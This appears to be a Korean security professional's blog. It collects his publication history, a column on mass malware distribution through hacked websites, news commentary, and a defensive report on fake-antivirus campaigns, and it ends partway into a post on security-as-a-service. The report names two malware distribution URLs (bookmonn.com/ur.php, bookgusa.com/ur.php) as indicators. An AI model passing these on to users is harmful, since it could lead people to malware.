2003.1.25 대란 – 1.25 대란의 최초 신고자 및 분석자 ( 최초 신고자 맞습니다. ^^)

1.25일 당일의 1차 분석 문서 
 

1.26일의 2차 분석 문서

1.27 . 최종 시나리오 분석 문서

 

2005– 1.25대란에 대한 최종 의견 -http://p4ssion.com/117  KT 내부망에서 시작

 
 
2003.8 RPC Worm 확산에 따른 분석 문서


 

2005.1 Application Attack 에 대한 문서 – PHP Mass Attack에 대한 분석과 대응방안

 

2005.3 해커의 길 II - http://p4ssion.com/228

2005.4 Zeroday 웜에 대한 발표, 공격기법 분석과 향후의 발전 예상

 

2005.10 Threat of China 공격 분석 및 대책 발표 향후 웹 공격에 대한 집중도가 높아지고 자동화 되어 위험성이 높을 것임을 예상하고 분석한 발표자료, 대응 방안으로 2006 SourceForge에 등록한 Gamja가 처음 선을 보임.


2006.2 Winamp Application 문제의 현황 및 해결

 

2006.6 개인사용자를 위한 정보보호 실천가이드 문서

 

2006.10 해킹의 발전과 대응 발표 내용은 항상 유사합니다.


2006.11  중국발 해킹 분석 및 대응, (기업차원의 방안) 발표자료.


2007.4 게임산업에서의 Vista 파급효과와 보안의 이슈 문서

 

2007.6 Web 2.0 위험요소와 대비. 발표자료

 

2007.11  IT서비스의 위험과 향후 대응 문서

DDos와 악성코드 확산 모델, 대응 방안에 대해서 기술한 문서.. 대책이 제대로 되었다면 이후의 7.7 DDos 3.4 DDos도 헤프닝으로 끝날 수도 있었을텐데현재까지도 매우 부족한 부분들이 되겠습니다. 앞으로도 많이 해야 하는 부분이기도 하구요.

 

2008.01 Enhanced web, Enhanced Risk –발표자료. Web 2.0의 위험에 대한 발표

 

2008년 이후는 컬럼을 주로 활용 하였습니다. 

Bloter.net  - http://www.bloter.net/archives/author/p4ssion

Zdnet - http://www.zdnet.co.kr/column/column_list.asp?column=0135

이외 보안뉴스, 전자신문이 있습니다.

 

2009. 07 . 7.7 DDos에 대한 내용. DDos 악성코드 유포에 대한 추론과 사실 문서

 

2009.11 Inevitable Cyber warfare – 7년만에 내 놓은 SCADA & DCS 위협에 대한 갱신문서 사이버 아마겟돈 시나리오 가이드 하면서 갱신판을 작성함. 이후 2010 Stuxnet 출현

 

2009.11 Change of global threat – 컬럼

 

2010.07 DDos문제의 핵심과 변화에 대하여 문서

 

2010.11 네트워크 단위 보안 솔루션의 미래와 전략 발표자료 - Concert

 

2010.11 에스토니아 7.7 그리고 미래대응 발표자료 – Ddos 공격과 국가간 사이버전에 대한 분석

 

2011.3 위기의 인터넷 (현재의 위협과 미래 대응) – 발표자료

 

2011.07 해커의 길, 전문가의 길 발표자료 방향성 제시를 위한 자료

 


현재까지 검색을 통해 확인한 발표자료와 문서들입니다
. 제가 만들었던 자료를 검색을 통해 찾아야 하는 상황이 어이없긴 하지만 ^^; 아직 찾지 못한 문서들도 있고 수록 되지 않은 발표자료들도 있습니다. 이 부분은 차후 계속 갱신 하도록 하겠습니다. 이외에도 프로그램이나 의미 있는 변화를 가져왔던 내용들도 있는데 기업에서 시행 했던 것들 중 대외적으로 영향이 있었던 두 가지만 언급 하도록 하겠습니다.

 

2005 . 온라인 보안패치 서비스 실시 이전까지의 보안 업데이트는 패치를 MS 웹사이트에서 방문하여 다운로드 받아 설치하는 유형이였으며 이 당시 국내 기업 (소프트런? )과 처음으로 웹서비스에서 자동으로 설치되는 서비스를 운영 하였습니다. 최종 기억으로는 1200만대 가량의 PC에 보안패치를 깔았던 것으로 기억 합니다. 이후 2006년 부터는 MS의 패치 정책이 자동업데이트 방식으로 변경 하는데도 영향을 주지 않았을까 싶습니다.  공격자들이 가장 많이 활용하는 취약성에 대해서 패치를 함으로써 공격자들에게도 영향을 미쳤다고 보고 있습니다. –  http://blog.naver.com/p4ssion/50004629544  관련 기사입니다. 이 블로그도 폐쇄 했지만 자료보관 용도로 남겨 두고 있습니다. 

 

2007. End to End 단계의 키입력 보호 시스템  - 이 당시까지 가장 유행하던 공격기법은 BHO를 이용한 계정 탈취 기법 이였고 이것을 막기 위해 제안한 보호 시스템입니다. 이건 네이버에서 지금도 운영 되고 있죠. 1,2,3 단계 각각마다 의미가 있고 보호율이 매우 높은 체계 였습니다. 이후에는 다수의 기업들에서 모방이랄까? 뭐 그렇더군요. 현재도 유효한 방안입니다.

 

회사의 경력은 너무 지저분(?) 하여 따로 기술하기가 민망합니다. 쓰다보니 요즘 유행하는 나꼼수의 깔때기 성향이신 분하고 비슷한 스타일이 되었네요.

 

정리하면서 보니 정말 유사한 말을 많이도 했네요. 그래도 세상은 아주 조금씩 밖에 변하지 않았고 위험들은 그대로 입니다. 앞으로는 말이나 글보다는 직접적으로 보여 줄 생각입니다. 이미 일정궤도에 오른 상태이고 어떤 식으로 눈 덮인 길을 헤쳐 나가는지 진지하게 보실 수 있으실 것입니다. 

 
바다란 세상 가장 낮은 곳의 또 다른 이름

Posted by 바다란
- zdnet 컬럼입니다.

학명 ‘Mola Mola’는 개복치를 뜻한다. 어류중에 가장 많은 알을 낳는 것으로 알려져 있다. 한번에 3억개 가량의 알을 낳는데 이는 성체로 자라는 수가 극히 드물기 때문이다. 서식지는 전 세계 온대·열대 바다에 걸쳐 분포하고 있다. 또한 한국의 전 해안에 걸쳐 나타나고 있다. 

 

필자는 지금의 인터넷 보안의 현 상황을 어쩌면 가장 잘 설명할 수 있는 것이 개복치이고, 개복치의 학명이 아닐까 생각한다. 한국어 발음으로 ‘몰라 몰라’라고 외면하는 상태쯤 될 것이다. 

 

보안에 관해 지금의 복잡하고도 위험한 상황을 이해하기 쉽도록 알리는 것에 대해 항상 고민해 왔다. 그러나 이 상황을 표현할 가장 적절한 예를 찾는 것이 너무나도 어려웠다. 그러나 지난 1년여 간의 관찰로 자료가 축적되고 계속 갱신해 왔기에 이제는 좀 더 많은 것을 설명 할 수 있을 것 같다. 

 

필자가 보는 위기의 인터넷과 개복치는 대체 무슨 관계가 있을까? 자 이제 시작해 보자. 

 

▲ 개복치(학명 `Mola Mola`)

■악성코드 감염 범위와 대상의 변화 

 

악성코드라는 개념은 더 이상 국지적이고 네트워크 단위로 한정된 위협이 아니다. 인터넷 활성화 이전에는 전파 도구가 한정적이라 지역에 특화된 악성코드들이 출현 할 수 밖에 없었다. 그러나 지금은 인터넷상에 무차별적으로 유포·감염되고 있는 상황이다. 

 

이 감염의 주요 매체로는 영역의 제한 없이 접근 할 수 있는 웹 서비스가(SNS도 동일하다)가 주된 통로로 사용 되고 있다. 오늘 발견된 새로운 악성코드는 1시간 이내에 전 세계에서 동일하게 발견 할 수 있다. 즉 감염의 주체가 국가나 지역이 아닌 언어권역, 소속, 취미에 의한 분류로 변경 되었다고 볼 수 있다. 

 

동일한 취미를 가지고 있거나 특정 소속에 속하거나 특정 언어권역에서 활발한 서비스의 경우, 악성코드의 감염대상은 그 권역으로 제한이 된다. 또 특정 그룹의 사람들만이 접근 하는 사이트가 있다면 그 각각을 공격하는 것보다 더 효과적인 것은 특정 사이트만을 공격하고 방문자들에게 악성코드를 설치하게 하면 된다. 이걸 타깃화된 공격이라고도 할 수 있다. 

 

오늘날 공격분류는 크게 두 종류로 볼 수 있다. 감염대상을 가리지 않는 무차별적인 유포와 특정대상만을 목표로 한 타깃화된 공격이 전부이다. 이중 타깃화된 공격은 이메일이나 PDF, 오피스 문서의 취약성을 이용해 공격을 시도한다. 무차별적인 유포는 스팸메일, 웹을 통한 악성코드 유포가 주류를 이룬다. 웜은 이미 네트워크 단계에서 증상이 판별 가능하고 지금은 위험순위가 낮다고 보아야 한다. 

 

전체의 악성코드 확산에 대한 현황과 분류에 대해서 가볍게 정리를 해보았다. 이번 컬럼에서 말하고자 하는 부분은 무차별적인 유포도구로 활용되는 웹 서비스 그리고 악성코드의 확산에 대한 현실적인 문제이다. 

 

개복치가 알을 3억개나 낳는 이유는 생존가능성을 높이기 위한 자연의 법칙이다. 3억 개의 알 중 성체로 자라는 것은 1~2개체뿐이다. 만약 모두가 성체로 자란다면 바다는 곧 개복치로 가득 차게 될 것이다. 바다는 자연 개체 조절이 되나 지금의 인터넷 환경은 천적은 부족한 반면, 생산력이 극도로 강한 악성코드로 가득 찬 바다이다. 특히나 우리나라는 더욱 더 심각하다. 

 

■악성코드의 바다 

사회활동을 하는 대부분의 사람이 인터넷을 사용한다. 웹이라는 매개체를 통해 서로 의견과 정보를 교환하고 경제 활동을 한다. 페이스북이나 트위터 같은 SNS도 거대한 웹 서비스 플랫폼일 뿐이다. 

 

이렇듯 모든 사람이 접근하고 활용하는 홈페이지에서 방문자에게 악성코드를 뿌리는 것은 공격자들이 효과를 극대화 할 수 있는 방법이다. 웹 서비스 자체를 보호하기 위해 많은 보안적인 도구와 수단들이 동원 되지만 공격기술은 진화하고 확산도 빠르다. 즉 보호하는 부분에 있어서 기술적 차이를 감당 할 수 없고 금새 무용지물이 된다는 말이다. 웹 서비스 자체의 보호는 늘 한계를 가질 수 밖에 없다. 

 

직접적인 공격으로 공격자는 웹 서비스들의 권한을 획득하고 지켜본다. 그리고 수십 혹은 수백이 될지도 모르는 웹 서비스의 권한을 가진 공격자는 이제 손쉽게 공격코드를 사용자에게 뿌리도록 소스를 변경 한다. 웹 서비스의 소스를 변경 한다는 것은 모든 방문자가 영향을 받는다는 말이다. 예를 들어 회원이 7억명인 페이스북 서비스의 공용모듈이 변경 된다면, 그 모든 회원이 영향을 받는다. 가능성만으로 따지자면 7억에 해당하는 좀비 가능 PC를 확보하는 것과 마찬가지이다. 

 

쉽게 말해 Mola Mola 한 마리씩을 웹 서비스에 올려 두는 것이다. 그리고 모든 방문자에게 친절하게도 사용자 환경에 맞는 하나씩의 알을 선사한다. 이제 이 알의 부화를 막을 수 있는 방법은 개인 PC에 설치된 보안도구 이외에는 없다. 그러나 이 보안도구에서도 감지가 되지 않도록 공격자는 이미 조치를 한 상황이다. 

 

결론적으로 모든 방문자들에게 뿌려진 모든 알들이 그대로 성체 (악성코드화)로 커가는 것을 의미한다. 인터넷 비사용자를 제외하고 모두가 노출 될 수밖에 없는 상황이다. 어도비 사의 플래시 업데이트는 왜 이리도 잦은 것일까? 보안 업데이트는 이리도 많고 문제는 끊임없이 나온단 말인가? 

 

■다형성(Polymorphism) 그리고 '나 몰라(Na Mola)' 

 

악성코드 한 종류만 내려 온다면 문제는 쉽다. 그러나 상황은 그렇지 못하다. Mola Mola만 올려서 알을 뿌리는 것이 아니라 수시로 어종을 바꾸어 다른 종류의 알(악성코드)을 뿌려댄다. 올해 3월 이전까지는 3일 간격으로 다른 종류를 유포 하였으나 3월 이후에는 주말에만 유포를 한다. 그것도 순식간에 다른 종류로 바꾸기를 거듭한다. 

 

여기에서 뿌려지는 각각의 악성코드들을 어류에 비교하여 이름 붙이자면 학명으로 ‘Na Mola’ 정도 되지 않을까? 이는, 한국어 발음으로, 현재의 대응 상태와도 연관이 있다. 

 

백신업체들은 여기 뿌려지는 알들 각각을 상대한다. 분석과 제품업데이트에만도 많은 시간이 소요됨에도 불구하고 업데이트가 일어날 때쯤이면 이미 공격자들은 다른 종류의 알을 뿌리기 시작한다. 다시 처음부터 반복이 된다. 그만큼 공격자들이 가진 다양한 제작도구들과 백신이나 보안도구들의 회피로직들이 손쉽게 적용 되고 있고 효과적임을 의미한다. 인터넷 환경에서는 재앙과도 같은 일이다. 

 

▲ 한국을 대상으로 악성코드 설치에 사용되는 공격코드 중 하나(비유적으로 알을 가진 개복치쯤 된다). 전 세계 42개 주요 백신 중 단 3개만 탐지되고 있다. 

백신에서 탐지를 못하는 것은 APT(지능형지속가능공격)이고 정체를 모르면 무조건 어디의 소행이라는 것은 지금의 시대에 맞지 않다. 현재의 상황에 비추어 보자면 지금도 최소 수십 만개의 APT들은 사용자들의 PC에 안착되어 있는 상황이다. 발견될 때마다 APT라고 할 것인가? 똑같은 기능으로 목적만 다르게 활용하는건데 사건이 커지면 APT라하고 아니면 그냥 신규 악성코드인가? 

 

한계를 인정해야만 하고 역할과 기능의 차이점에 대해서 이해를 해야 하는데 아직 부족해 보인다. 책임전가는 오래가지 못한다. 역할분담과 협력을 해야하는 것이지 모든것을 다 하겠다는 것은 지금과 같은 위험의 시대에 현실인식이 없는 것과 마찬가지이다. 

 

사이버 상의 위험을 더 이상 단순한 계정탈취나 개인정보 유출의 문제로만 국한해서는 곤란하다. 이미 우리는 발전소를 위협하는 공격을 이미 목격 했고 올해에도 어떤 원인에서든 전력, 금융에 관련된 치명적 문제들을 확인 할 수 있었다. 즉 더 이상 사이버상의 위협은 사이버상에 국한되지 않는다는 것이다. 

 

■그렇다면 어떻게 대응해야 할까? 

 

국내 PC 환경에서 Flash Player가 깔리지 않은 비율은 5%도 되지 않을 것이다. 플래쉬를 배제한 애플사의 운영체제를 제외한 모든 곳에서 문제가 발생된다. ActiveX? 말을 말자. 지금의 문제는 플래쉬다. 사용자 PC에 설치된 플래쉬 플레이어의 취약성을 이용해 공격자는 소리소문 없이 새로운 악성코드들을 다운로드 받게 하고 시스템을 조정한다. 또한 이 악성코드들은 수시로 변경이 되고 새로운 종이 되기도 한다. 어떻게 해야만 대응이 가능한 것인가? 

 

단순한 비유로 예를 들자. 알은 퍼져 나간 상태에서 일일이 대응을 한다는 것은 정말로 어려운 이야기이다. 공격자는 단 한번의 클릭으로 악성코드의 종류를 변경하고 대규모로 유포하고 있다. 알과 같은 악성코드들은 퍼져 나가기 전에 대응을 해야 하고 근본적으로는 웹 서비스에 상주된 Mola Mola(악성코드 유포 경로)류의 위험이 더 이상 들어오지 못하도록 지속적이고 끊임 없는 노력을 해야만 문제 해결이 가능하다. 들어온 이후에는 피해를 최소화 할 수 있도록 빠른 인지가 되어야 할 것이고 대응이 되어야 위기 상황이 진정 될 것이다. 

 

지금과 같이 확산된 이후에 사후 대응을 하는 것은 “Na Mola(나 몰라!)” 이외에는 아무 것도 아닌 것이다. 확산을 최소화하기 위해 웹 서비스가 공격자에 의해 변형 되는 초기 단계에서 인지하고 대응을 해야 하며 더 이상 변형이 일어나지 않도록 문제를 계속적이고 끊임없이 보강해야 한다. 인터넷의 바다에 맞닿아 있는 모든 웹 서비스들은 동일한 과제를 지녀야만 문제를 해결 할 수 있다. 

 

근본적으로는 악성코드들이 대규모로 사용자 PC에 유포되기 이전에 초기 대응을 해야만 이 위기 상황 속의 인터넷을 견뎌 나갈 수 있을 것이다. 다시 한번 말하지만 퍼지고 난뒤에는 어떤 경우라도 수습이 어렵다. 

 

서비스를 운영하는 회사의 경우 생활과도 같은 점검을 모든 노출 웹서버에 대해 하지 못하면 1단계에서는 현대캐피탈 , 2단계에서는 소니, 3단계에서는 농협의 사례를 맞이하게 될 것이다. 그만큼 지금의 상황은 당장 공격자들이 점령군 행세를 해도 어쩔 수가 없는 위중한 상황이다. 

 

2007년에 IT서비스의 위험과 향후 대응에 대해 정리를 해두었다. 5년이 지난 지금조차도 대응은 여전히 더디고 제자리 상태다. (http://p4ssion.com/199

 

가장 뛰어난 사냥꾼은 쫓아 다니는 것이 아닌 길목에서 기다리는 사냥꾼이다. 지금은 발자국만 보고도 전부 허둥지둥 하지는 않는가? 전략이 절대적으로 필요한 시기이다. 다음에는 공격자들의 전략변화와 위기를 헤쳐나갈 준비된 해결 방안에 대해서 쓰도록 한다. ‘나 몰라’라 해서는 안 되는 것이다.
Posted by 바다란

* Facebook에 올렸던 촌평을 묶어서 게시한 내용입니다. - p4ssion

Chinese Military Suspected in Hacker Attacks on U.S. Satellites - Businessweek
 

http://www.businessweek.com/news/2011-10-27/chinese-military-suspected-in-hacker-attacks-on-u-s-satellites.html

블룸버그 뉴스보도 입니다. 2007년과 2008년에 미국의 기상관측 위성과 지형관찰 위성에 4회 정도의 침입이 있었다는 보도 입니다. 

항상 오해를 하는 것이 위성을 해킹한다는 것은 위성에 직접 침입한다는 것이 아니고 위성을 조정하는 지상의 시스템을 권한 획득 했다는 것이죠. 마찬가지 결과 입니다만 항상 오해를 하죠.

실제 위성에 대한 권한 획득이나 외부조정의 배경에는 중국 군부가 있을 것으로 당연히 예측 되었으나 중국은 부인 하죠.

실제 사이버전의 배경도 마찬가지 입니다. 외부세력에 의해 분쟁이 조정 될 수도 있고 또 다른 세력에 의해 사이버전이 조장 될 수도 있습니다. 그만큼 실체와 정체를 확인 하기가 어려운 전장임은 분명합니다.

또 상대방을 조작하기에도 손쉬운 전장이구요. 미국에서 사이버전을 제 5의 전장으로 정의하고 물리적 전투력을 투입 하겠다는 것은 그래서 위험한 발상입니다. 위험한 발상이지만 그만큼 극도로 위협을 받고 느끼고 있다는 것의 반증이기도 하죠.

그럼 우리나라는??. 

흐 손이 아프니 그만 하도록 하죠.




China a minimal cyber security threat: Paper

관련 기사 및 Report 입니다. 한번 일독은 필요한 부분 입니다.
http://www.computerworld.com.au/article/405767/china_minimal_cyber_security_threat_paper/

http://www.securitychallenges.org.au/ArticlePDFs/vol7no2Ball.pdf   

중국의 단점은?. 한쪽으로 너무 치우쳐진 불균형적인 사이버전 전력.

극단적인 공격 측면에만 치우쳐져 있고 실상 방어에는 무기력한 면을 보이고 있다는 점. 단순한 기사들과 관련 기사들을 묶어서 종합적인 의견을 도출해낸 페이퍼 정도. 그냥 일상적으로 알고 있는 내용을 묶었다고 생각 하면 될듯.

공격에는 극한대로 올려진 공격력을 가지고 있으나 좀 더 복잡하고 하이브리드한 공격에는 약하며 ( 뭐 시간이 해결해 주겠지만.) 방어 측면에서는 상당히 취약함을 보임. 그러나 가장 두려워 해야 할 곳들은 어디인가를 살펴야 하는데 그게 부족한듯.


ICT가 활성화 되어 활발하게 활용되고 있는 모든 국가들 ( 아마 선진국이나 그 문턱에 걸려 있는 모든 국가가 해당됨), 즉 지켜야 할 것이 많은 국가들은 반드시 방어와 보호에 역량을 갖추어야 된다. 무조건 공격이나 탐지 되면 미사일 쏘겠다는 엄포로는 씨알도 안먹힌다는걸 알아야 되는데 안타까움.

일정수준 이상의 대응 경험, 계속 갱신되는 환경과 정보에 대한 업데이트, 다양한 대응수단, 일정 수준 이상을 항상 유지 할 수 있는 도구나 서비스의 자체 운영 등등.. 해야할 과제들이 이렇게 많은데 그냥 넋을 놓고만 있다.

일단 당하면 시작하자 ..이기도 하고 너무 무지해서 이기도 하며 정보통신은 그저 사회를 유지하는 도구일뿐이라고 생각하기 때문이기도 하다. 

인간의 단어는 사람 사이이고 사람 사이는 관계를 의미한다. 이 관계가 사회를 이룬다. 지금의 ICT 는 관계를 시.공간적으로 단축하고 즉시적 반응을 끌어내는 핵심적 도구다. 즉 사회의 기반이라는 말이다. 왜 SNS 인가? 부터..

허긴 당하고서도 허송세월 하기도 하는데 .. 다른 나라들을 말할때가 아니기도 하지.



Process, not just product, will save your IT department • The Register

http://www.theregister.co.uk/2011/10/26/rtfm_process/
 

일단 여기에 대한 의견은 많음. Grossman 의 의견도 맞지만 프로세스가 모든걸 해결 하지 않으며 그 프로세스가 또한 정답이 될 수 없음. Intermediate 한 도구 및 프로세스가 결합되어야 하는데 현재는 그것과 거리가 있음. ITIL 이나 Cobit , ISO27K 등도 모두 유용한 프로세스이나 이 프로세스를 도입하여 적용 하기에는 성숙도가 너무 떨어짐.


부유하고 여유가 있는 자들만이 이 세상을 가치있게 만드는 것이 아님.
모든 사람들에게 공정한 기회가 주어져야 하고 보안도 마찬가지 여야 된다고 생각함.

지금까지는 가진자들에게만 모든 보호 방안들이 주어졌으나 이제는 그렇게 되어서는 사회 나 시스템 전체를 레벨업 할 수가 없다고 보고 있슴.

그래서 본인의 선택은 ..모든 것을 자세하고 완벽하게 하기 보다는 가장 시급하고 손쉽게 공격당하는 부분들에 대해서 체크하고 아주 저가에 진단이 가능하며 실질적인 코딩 가이드까지 된다면 일차적인 문제는 해결을 할 수 있다고 봄.

빈자나 부자에게나 공정한 기회. 그 기회는 서비스로서 주어질 수 있다.

항상 보안을 한다고 하면 비싼 장비를 먼저 도입하는 것이 순서이고 당연한 것처럼 여겨졌으나 이 문제들은 앞으로도 공격기술의 빠른 진보에 의해 손쉽게 무너질 모래성임. 그렇다고 도입 하지 말자는 아니며 도입하되 더 중요한 가치를 어떻게 지키고 전체의 수준을 어떻게 유지 할 수 있을 것인가에 대한 고민이 필요하다는 점.

부자는 전체를 살펴 볼 수 있게 해주고 빈자에게는 당장의 시급한 문제를 해결 할 수 있게 해준다가 빛스캔의 서비스 컨셉임.

다만 한국에는 실정상 맞지 않는 부분이 있고 이미 알고 있는 부분이며 지금의 서비스 오픈은 차후를 대비한 명분축적용. 이미 글로벌 적용은 눈앞에 온 상황이고 거기에 포커싱이 되어 있을 뿐임.

제대로 되었을 경우의 뒷일에 대해선 언급 불필요.
알아서 느낄리도 없겠지만 댓가는 비싼 댓가를 치룰 것임.

이미 오래된 이야기이고 생각일뿐. 이젠 구체화의 타임.
앉아서 세상을 본다. 이게 인터넷이고 평등한 세상. 모두가 위협을 받는 평등한 세상에서 기회란 접근성의 확대와 시대적 문제를 해결 할 수 있느냐 이고 아직 이런 개념을 가지고 준비하는 곳은 없다. 오로지 돈이 목적일뿐.

이상과 방향이 없는 기업이나 서비스 모델은 이래저래 바뀌고 변경 되다 누더기가 되게 마련이고 종래에는 흔적없이 사라지게 마련이다. 그렇게 만들지는 않을 것이다. 어차피 대상은 여기가 아니니까..



Strong increase in hacker attacks targeting retailers - Security Park news

http://www.securitypark.co.uk/security_article266904.html

Dell Secure works에서 소매점 대상으로 분석한 공격의 증가 현상과 원인에 대한 내용. 의미 있는 내용들이 있슴. 이제 해외에서도 상황에 대한 기본 인지가 되어 간다고 봐야 할듯. 그러나 해답은 저기 먼 안드로메다에 여전히 가 있는 상태. 어쩌면 말그대로 자포자기 상태로 가는지도 모르겠다. 

지금껏 그 완벽한 보안솔루션 ( 최초 혹은 완벽 이라는 말이 안 붙은 솔루션이 있던가? .. 단지 현혹을 위한 단어 선택이라면 앞으로 계속 후회하게 될듯) 들의 역사는 그리 오래 되었음에도 불구하고 문제는 계속 더 커지고 확산 되는가 .. 고민이 필요하다.

간단하게 요약하면 전년대비 소매점으로 부터 들어오는 의심 트래픽에 대한 차단이 거의 43%가량 증가 했다는 이야기이고 이 근간에는 세 가지 주요 요인들이 존재 한다고 분석 .

1. SQL Injection에 의한 직접 정보 탈취 및 권한 탈취 -서비스 영역 

2. Web kit에 의한 대규모 확산 - 뭐 별거 아니다. Web으로 조정이 가능한 Web bot 정도 생각 하면 된다. 예전 Botnet은 저리 가라 할 정도..

3. Web을 통한 Download action에 의한 감염 - 이건 기본 보호 솔루션들을 통과하여 발생 하고 이후 Web kit을 전파하거나 다양한 공격 도구 및 권한 획득 도구를 시스템에 설치한다. 

이 세가지 항목 모두 사용자 베이스 및 서비스 베이스에 동일하게 발생이 된다는 것이고 근본적인 것은 단 하나다.

취약한 웹 애플리케이션에 의한 정보 유출 및 악성코드의 대규모 유포가 핵심!.
그리고 이 문제점을 수정 ,보완 하는 것은 매우 어렵다는 것을 의미한다. 수없이 많은 도메인 , 언제든 수시로 변경 되고 갱신되는 Web app 차원에 상시적인 보안을 유지 한다는것은 매우 어려운 과제이다. 앞으로도 계속 될 문제라는 것. 

앞으로 더 증가 할 것은 불을 보듯 뻔한 것 아니겠는가?
기존 도구들로 최대한 노력을 해보길~ 자신 이외에 주변 것들 까지도 같이 수준을 올려야 할 것이다. 듣기좋은 말 하지 않겠다. 할 수 있으면 해볼 것.

  
Posted by 바다란
* 9.14일의 점검 결과로 추가 보강 하였습니다. 9.10일 3개 사이트 5개의 링크에서 국내만 현재 19800여개의 페이지로 확산 되어 있습니다. 자동화된 공격이 얼마나 일반적인지 확인 하시기 바랍니다. 더불어 구글의 검색 수집과 정렬의 시간차가 있고 공격자들은 이미 이 패턴을 가볍게 벗어난다는 것이죠. 9.14 현재에도 새로운 fake av 유포 URL이 발견 되었습니다.  
fake av를 설치하는 링크가 추가된 사이트들 모두 DB의 데이터는 모두 유출 되었다고 봐야 됩니다. 이제는 그 가치도 없어서 다만 fake av를 설치하는 껍데기로 전락한 사례가 되겠죠.  근본 문제 수정 없이는 계속될 이야기 입니다.

------------------------------------------------------------------------------

이틀전 올린 허위백신 설치 통로인  bookmonn.com/ur.php가 구글 검색에 반영되기도 전에 어제( 2011 9,9)부로 새로운 경로로 변경이 되고 있다. 현재 모니터링 대상에서만 70여곳 (국내사이트 ) 이상인데 불구하고 구글 검색에는 10개 정도 나온다. ~ 

구글 검색 믿지 마시라.~ 그냥 자료 찾는 정도로만 활용하자. 구글의 세이프 브라우저도 마찬가지이다. 크롬이나  파이어팍스 사용중에 붉은색으로 화면 전환 되는 것들 몇 번 경험들 하셨을텐데.. 그 실체가 구글의 데이터 기반 ( stopbadware.org 참고) 이다. 과연 믿을만 한 것인가에 대한 의심은 누구도  하지 않았을 것이다. 또 실제로 구글 같은 규모의 회사와 서비스에 검증할 만한 용기를 가질 곳도 없을 것이다. 전 세계  누구라도..


데이터와 증명이 가능한 수치만 있다면 동일 모집단 대상으로 하였을 경우에도 충분한 설득력을 가질수 있다.
이미 데이터는 누적이 되어 있고.. 잠시 여유 있다면 더 진행 할 예정이나 단순히 눈에 보이는 몇 가지 만으로도 부분적인 확인들은 가능하다.

과연 실제 위험은 무엇인가? 하는 질문도 가져야 할 것이고 빙산의 일각은 정말 운이 좋아야 걸리는 정도라고 해야 될까?  
 
검색을 통해 나오는 공격의 흔적은 이미 검색에 나오는 이상으로 대규모 확산되어 있는 것이 기본이다. 성공한 공격은 통계에 나오지도 않는다.  일부 실패한 것들만 어쩌다 걸릴뿐인거다. 검색어 기반의 패턴을 이용한 매칭은 초기 자료의 정렬에도 많은 시간이 소요 될 수 밖에 없다. 그리고 패턴매핑에 걸려드는 데이터들도 시일이 지나야만 정리가 될 것이고 의미 있는 자료가 될 수 있다. 이때는 이미 공격은 한차례 지나가고 또 다른 변화를 가진 다음일 것이다.

 
이틀전 9.7일에 발견된 bookmonn.com/ur.php 를 이용한 허위백신 경로가 대폭 변경이 되고 있다.
bookgusa.com/ur.php 로 변경 되었다.  그리고 이 데이터는 지금 이순간 전 세계 어느 누구도 모른다. 오직 공격자와 우리만 알고 있을 뿐이다. 그 결과를 살펴보자.

이미지 상으로 보면 중복제외하고 국내는 세곳이 나온다. 그리고 전세계를 통털어도 10곳 미만이 나온다. (중복제외).. 그러나 빛스캔의 대규모 유포 탐지에는 이미 70곳 이상의 웹서비스에서 유포가 되고 있다. 

성공한 공격은 나타나지 않으며 무작위로 대입하다 실패한 것들만 일부 드러나는 현실이라는 점을 인식해야 한다. 또 fake av 설치로 유도하는 경우는 대부분 다운로드 없이 이슈가 발생하고 있어서 탐지나 대응은 아주 한참 뒤에나 가능해 진다.  대체 사전 대응. 즉 선제적 대응이라는 말은 이 분야에서 가당키나 한 것일까?

체계를 위협하는 진짜 위험한 것들은 검색 정도에 걸리지 않는다. 대놓고 공격하는 조무래기들 조차도 제대로 찾지 못하는 마당에 무얼 할 수 있을까?

 
구글 보다 나은게 뭐냐는 질문이 있어서 .. 신속, 정확, 현실적 위험도를 보는 관점이 다름을 알려 드리기 위해 잠시 소개한다.





또 하나의 그림을 보도록 하자. 9.10일자로 감지된 빛스캔 탐지 체계의 일부 화면은 다음과 같다.
큰 차이를 보이고 있음을 알 수 있다.  웹소스를 분석하는 구글조차도 결과가 형편 없을진대 다른 보안업체들은 말해 무엇하랴.. ( 국내는 비교할 필요 없이 전 세계 주요 기업들 모두 마찬가지이다. ) 현재 거의 할 수 있는 일이 없을 것이다.  한참 지난 후 침해사고 분석이나 여러 자료를 통해서 확인을 할 뿐이고...



  좀 더 재밌는건 현재도 유일하게 잡아내는 체계이지만 곧 탐지이후 분석 단계까지 자동화 단계로 돌입 된다는 점이다. 공격하는 자들과 경쟁이 될 수 있을것 같다. 전 세계를 무대로... 

다른 기업들과 경쟁 하는 것은 관심이 없다. 공격하는자들, 조롱하는 자들과의 승부가 가능한가에는 관심이 있다. 또 그것이 궁극적으로 최선의 길에 이르게 할 것임을 이미 잘 알고 있다. 그 길에 열정을 다할 뿐인것이다.

* 추가 확인을 위해 9.14일 오후에 확인된 구글 검색 결과를 올려 드립니다.
현재 국내 도메인만 19,800 여개의 페이지에 걸려 있음을 확인 할 수 있습니다. 불과 4일전만 해도 3개 사이트 5개의 페이지만 나오던것에서 말이죠. 현재 공격의 심각성을 분명히 인지해야 할 것입니다.


- 바다란 


Posted by 바다란

진짜 SaaS (Security as a service)는 무엇인가? – 서비스 시작에 부쳐

-바다란

지금의 시기에 Saas의 필요성이란 공격자 우위의 현재 인터넷 상황에서 절대적으로 필요하다. 고급화되고 차별화된 진입장벽을 유지하고 있는 현재의 보안서비스로는 대중적으로 넓게 퍼지고 있고 빠른 확산력을 가지고 있는 공격도구와 기법에 대해 무기력 하기만 하다.

현재 상태에서 공격자들은 대규모적이고 자동화된 공격 방법을 다양하게 가지고 있으며 실제 활용하고 있는 상황이나 대응의 측면에서는 매우 제한적인 영향력을 가질 수 밖에 없다.

첫째는 비용의 문제

“ 보안 서비스를 받는 다는 것은 양질의 서비스를 고급화된 인력으로부터 받기 때문에 그만한 가치를 지불해야만 한다. 자주 변경 되는 웹서비스에 대해 매번 보안진단과 서비스를 받는다는 것은 배보다 배꼽이 더 큰 경우를 자주 양산하게 될 수 밖에 없다. 현재 국내의 상태에서도 보안서비스를 받는 기업의 비율은 전체 웹 서비스에서 10% 미만 이라고 볼 수 밖에 없다. 여력이 있고 지켜야 할 그 무엇이 있는 기업 군에 한해서만 서비스가 이루어 질 수 밖에 없는 환경 이기 때문이다. “

둘째는 기간의 문제

